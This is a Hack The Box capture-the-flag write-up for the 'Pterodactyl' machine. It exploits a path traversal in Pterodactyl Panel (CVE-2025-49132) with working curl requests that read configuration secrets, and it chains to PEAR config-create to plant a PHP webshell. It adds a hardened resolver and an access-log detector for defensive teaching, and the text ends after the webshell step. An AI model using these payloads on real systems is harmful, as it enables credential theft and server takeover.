Hack The Box - Season 10 HTB Pterodactyl Writeup - Medium - Weekly - Feb 07th, 2026
HackTheBox: Pterodactyl - Writeup
- Difficulty: Medium
- OS: Linux (openSUSE Leap 15.6)
- Release: Season 10
Table of Contents
- Reconnaissance
- Web Enumeration
- Exploitation - CVE-2025-49132
- Remote Code Execution via PEAR
- Database Enumeration
- SSH Access
- Privilege Escalation
- Root Access
- Lessons Learned
Reconnaissance
Initial Port Scan
Starting with a comprehensive port scan to identify running services:
```bash
nmap -sC -sV -oN nmap/initial [TARGET_IP]
```
Results:
| Port | Service | Version |
|---|---|---|
| 22 | SSH | OpenSSH 9.6 |
| 80 | HTTP | nginx 1.21.5 |
The scan reveals a Linux host running SSH and an nginx web server. The HTTP title shows "My Minecraft Server", hinting at game server management software.
Service Fingerprinting
```bash
whatweb http://[TARGET_IP]
```
The response indicates a redirect and reveals PHP/Laravel headers, suggesting a Laravel-based application.
Web Enumeration
Virtual Host Discovery
Accessing the IP directly shows a default page. Checking for virtual hosts by examining the redirect:
```bash
curl -I http://[TARGET_IP]
```
The server redirects to pterodactyl.htb. Adding this to /etc/hosts:
```bash
echo "[TARGET_IP] pterodactyl.htb" | sudo tee -a /etc/hosts
```
Further enumeration reveals additional subdomains:
- panel.pterodactyl.htb - The Pterodactyl Panel admin interface
- play.pterodactyl.htb - Game server access
```bash
echo "[TARGET_IP] panel.pterodactyl.htb play.pterodactyl.htb" | sudo tee -a /etc/hosts
```
Panel Reconnaissance
Accessing panel.pterodactyl.htb presents the Pterodactyl Panel login page. Key observations:
- Framework: Laravel (PHP)
- Cookies: XSRF-TOKEN, pterodactyl_session (confirm Laravel)
- Version: Visible in page source/JavaScript files
Checking for publicly accessible files:
```bash
curl http://panel.pterodactyl.htb/robots.txt
curl http://panel.pterodactyl.htb/.env
```
The .env file returns 403, but this confirms its existence.
Exploitation - CVE-2025-49132
Vulnerability Overview
CVE-2025-49132 is a critical path traversal vulnerability (CVSS 10.0) affecting Pterodactyl Panel versions prior to 1.11.11. The vulnerability exists in the /locales/locale.json endpoint, which fails to properly sanitize the locale and namespace parameters.
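To make the root cause concrete, here is an added Python illustration (not Pterodactyl's code, and not a reproduction of its real loader): a resolver that joins the locale and namespace parameters straight into a file path, next to a hardened one that applies an allowlist and then a containment check. The directory `/srv/app/resources/lang` is a constructed stand-in for the application's language directory.

```python
import posixpath
import re

# Constructed stand-in for the application's language directory (assumption,
# not Pterodactyl's real layout).
LANG_ROOT = "/srv/app/resources/lang"

# Locale and namespace names should be simple tokens such as "en" or "validation".
TOKEN_RE = re.compile(r"^[A-Za-z0-9_-]{1,64}$")


def resolve_vulnerable(locale: str, namespace: str) -> str:
    """The flaw class: request parameters joined straight into a file path.

    "../" segments in either parameter walk out of LANG_ROOT, so the caller
    ends up loading (and JSON-encoding) an arbitrary PHP file.
    """
    return posixpath.normpath(posixpath.join(LANG_ROOT, locale, namespace + ".php"))


def resolve_hardened(locale: str, namespace: str) -> str:
    """Two independent layers: a strict allowlist, then a containment check."""
    # Layer 1: reject anything that is not a plain token (no "/", no "..", no NUL).
    for name, value in (("locale", locale), ("namespace", namespace)):
        if not TOKEN_RE.fullmatch(value):
            raise ValueError(f"invalid {name} parameter")

    # Layer 2: even after the allowlist, refuse any path that normalises to
    # a location outside the language root (defence in depth).
    path = posixpath.normpath(posixpath.join(LANG_ROOT, locale, namespace + ".php"))
    if not path.startswith(LANG_ROOT + "/"):
        raise ValueError("resolved path escapes the language root")
    return path


def is_accepted(locale: str, namespace: str) -> bool:
    """True if the hardened resolver accepts the pair, False if it rejects it."""
    try:
        resolve_hardened(locale, namespace)
        return True
    except ValueError:
        return False


if __name__ == "__main__":
    # The traversal shape from the write-up, run against both resolvers.
    traversal = ("../../../pterodactyl", "config/database")
    print("vulnerable resolves to:", resolve_vulnerable(*traversal))
    print("hardened accepts it?   ", is_accepted(*traversal))
    print("hardened accepts en/validation?", is_accepted("en", "validation"))
```

The allowlist alone is enough to stop the traversal; the containment check is kept as a second layer so that a future loosening of the allowlist (say, to permit regional codes with a separator) cannot silently reopen the hole.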
Testing the Vulnerability
```bash
# Attempt to read database configuration
curl -s "http://panel.pterodactyl.htb/locales/locale.json?locale=../../../pterodactyl&namespace=config/database" | jq .
```
Success! The response contains the full database configuration:
```json
{
  "default": "mysql",
  "connections": {
    "mysql": {
      "driver": "mysql",
      "host": "127.0.0.1",
      "port": "3306",
      "database": "panel",
      "username": "pterodactyl",
      "password": "[REDACTED_DB_PASSWORD]"
    }
  }
}
```
Extracting Additional Configuration
```bash
# Application configuration (includes APP_KEY)
curl -s "http://panel.pterodactyl.htb/locales/locale.json?locale=../../../pterodactyl&namespace=config/app" | jq .
# Mail configuration
curl -s "http://panel.pterodactyl.htb/locales/locale.json?locale=../../../pterodactyl&namespace=config/mail" | jq .
```
Extracted Credentials:
- Database: pterodactyl:[REDACTED]
- APP_KEY: base64:[REDACTED]
Remote Code Execution via PEAR
The PEAR Chain
While the path traversal allows reading configuration files, we can chain it with PHP's PEAR (PHP Extension and Application Repository) to achieve RCE. This technique works when:
- register_argc_argv is enabled in PHP configuration
- PEAR is installed (common on many systems)
Exploitation Steps
The attack leverages PEAR's config-create command to write arbitrary content to files:
```bash
# Write a webshell using PEAR config-create
curl -g -s 'http://panel.pterodactyl.htb/locales/locale.json?locale=../../../../../usr/share/php/PEAR&namespace=pearcmd&+config-create+/<?=system($_GET[0]);?>+/var/www/pterodactyl/public/cmd.php'
```
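From the blue-team side, both stages of this chain (the locale.json traversal and the pearcmd/config-create hop) leave a distinctive shape in the web server's access log. The following is an added Python detector, not part of the original write-up: it parses nginx combined-format lines, URL-decodes the query (twice, to catch double encoding), and flags locale.json requests whose locale or namespace parameter contains ".." or "/" as well as any query carrying the pearcmd or config-create markers. The log lines are constructed for the demonstration and the fourth one uses a placeholder argument in place of a payload.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed nginx access-log lines for the demonstration (not taken from the box).
# Lines 2 and 3 carry the traversal shape from the write-up (plain and URL-encoded),
# line 4 the pearcmd/config-create chain with a harmless placeholder argument.
SAMPLE_LOG = """\
10.10.14.5 - - [07/Feb/2026:10:00:01 +0000] "GET /locales/locale.json?locale=en&namespace=validation HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.10.14.5 - - [07/Feb/2026:10:00:07 +0000] "GET /locales/locale.json?locale=../../../pterodactyl&namespace=config/database HTTP/1.1" 200 1290 "-" "curl/8.5.0"
10.10.14.5 - - [07/Feb/2026:10:00:20 +0000] "GET /locales/locale.json?locale=..%2F..%2F..%2Fpterodactyl&namespace=config%2Fapp HTTP/1.1" 200 980 "-" "curl/8.5.0"
10.10.14.5 - - [07/Feb/2026:10:01:02 +0000] "GET /locales/locale.json?locale=../../../../../usr/share/php/PEAR&namespace=pearcmd&+config-create+/placeholder+/tmp/placeholder.conf HTTP/1.1" 200 40 "-" "curl/8.5.0"
10.10.14.9 - - [07/Feb/2026:10:02:00 +0000] "GET /api/client HTTP/1.1" 200 300 "-" "Mozilla/5.0"
"""

# Combined log format: client, identity, user, [timestamp], "METHOD target HTTP/x", status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})'
)

LOCALE_ENDPOINT = "/locales/locale.json"
PEAR_MARKERS = ("pearcmd", "config-create")


def classify_request(target: str) -> list[str]:
    """Return the rule names a single request target triggers ([] if clean)."""
    parts = urlsplit(target)
    if parts.path != LOCALE_ENDPOINT:
        return []
    hits = []
    params = parse_qs(parts.query, keep_blank_values=True)  # decodes %xx once
    for name in ("locale", "namespace"):
        for value in params.get(name, []):
            decoded = unquote(value)  # second pass catches double-encoded input
            if ".." in decoded or "/" in decoded:
                hits.append(f"traversal:{name}")
                break
    # The PEAR chain shows up as pearcmd/config-create anywhere in the query,
    # including inside parameter *names* built from '+'-separated argv.
    query = unquote(parts.query).lower()
    if any(marker in query for marker in PEAR_MARKERS):
        hits.append("pearcmd-chain")
    return hits


def scan_log(text: str) -> list[dict]:
    """Run classify_request over every parsable line; return the flagged ones."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        rules = classify_request(m["target"])
        if rules:
            findings.append({
                "ip": m["ip"],
                "time": m["ts"],
                "status": int(m["status"]),  # 200 on a flagged request means the read succeeded
                "rules": rules,
                "target": m["target"],
            })
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['time']} {f['ip']} {f['status']} {','.join(f['rules'])} {f['target']}")
```

A 200 status on a flagged locale.json request is the signal that matters for incident response, because it means the configuration file was actually served and the database password and APP_KEY should be treated as exposed; a patched panel (1.11.11 or later) should reject these parameters, and the rule then becomes an attempt indicator rather than a compromise indicator.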